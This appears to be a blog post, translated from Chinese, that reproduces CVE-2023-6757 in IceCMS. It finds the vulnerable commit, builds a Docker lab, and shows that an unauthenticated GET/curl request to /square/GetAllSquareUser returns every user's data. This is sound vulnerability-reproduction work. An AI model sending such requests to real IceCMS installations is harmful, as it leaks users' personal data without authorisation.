banner
For1moc

For1moc

签到型CTFer
HomeArchives

CVE-2023-6757 Reproduction Verification + Docker Environment Setup

198
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The CVE-2023-6757 vulnerability was found on December 13, 2023. A commit with version 68f3ed1 was identified to have the vulnerability. Steps to set up the environment, verify the unauthorized access vulnerability, and build a Docker environment were provided. Modifications to docker-compose.yml and application.yml were suggested. Additional resources for reference were also provided.

Find CVE-2023-6757 release date: December 13, 2023.

Then find the version with a commit earlier than this date: 68f3ed1.

Switch to this version and verify that the unauthorized vulnerability indeed exists.

Environment Configuration#

Database

create database icecmspro;
use icecmspro;
source icecms5.6.sql

Front-end IceWk-vues

npm install
npm run dev

Back-end

Configure data connection in application.yml

Download dependencies in pom.xml

Unauthorized Vulnerability Verification#

Access directly, no need to include Authorization header

GET http://localhost:8181/square/GetAllSquareUser

Returned all user data, which should only be visible to administrators

Docker Environment Setup#

The latest version provides a file for setting up IceCMS with Docker: IceCMS-Docker

Replace IceCMS-Docker/icecms-sql/IceCMS.sql with the vulnerable version's 8.0.sql file

In this version's .sql file, there are no "create database" and "use database" statements. Add the following content to it:

CREATE DATABASE If Not Exists icecms Character Set utf8mb4;
use icecms;

There is an issue with Linux line breaks in IceCMS-Docker/icecms-sql/setup.sh, handle it as follows:

sed -i 's/\r$//' setup.sh

There is no main.jar file in IceCMS-Docker/icecms-api/. We need to compile the backend and place it in that directory. Compile the vulnerable version.

There are two issues with docker-compose.yml:

  1. docker-compose.yml is not connected via docker network.

  2. The port mapping for icecms-sql is random. Change it to a fixed port 33060.

The modified docker-compose.yml is as follows:

version: '3.9'
services:
  # Database
  icecms-sql:
    build:
      context: ./icecms-sql
    container_name: icecms-sql
    image: icecms-sql
    restart: always
    ports:
      - "33060:3306"
    networks:
      - icecms-network

  # Backend service
  icecms-api:
    build:
      context: ./icecms-api
    container_name: icecms-api
    image: icecms-api
    restart: always
    ports:
      - "8181:8181"
    networks:
      - icecms-network

  # Front-end UI
  icecms-vue:
    build:
      context: ./icecms-vue
    container_name: icecms-vue
    image: icecms-vue
    restart: always
    ports:
      - "3000:80"
    networks:
      - icecms-network

networks:
  icecms-network:
    driver: bridge

Before packaging main.jar, modify the database configuration in application.yml:

spring:
  datasource:
    url: jdbc:mysql://icecms-sql:3306/icecms?useUnicode=true&useJDBCCompliantTimezoneShift=true&serverTimezone=UTC
    username: root
    password: 123456789
    driver-class-name: com.mysql.cj.jdbc.Driver

Go to IceCMS-Docker

docker-compose up --build

Vulnerability Verification in Docker Environment#

curl http://127.0.0.1:8181/square/GetAllSquareUser

1

References:

https://xz.aliyun.com/t/14366

https://nvd.nist.gov/vuln/detail/CVE-2023-6757

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.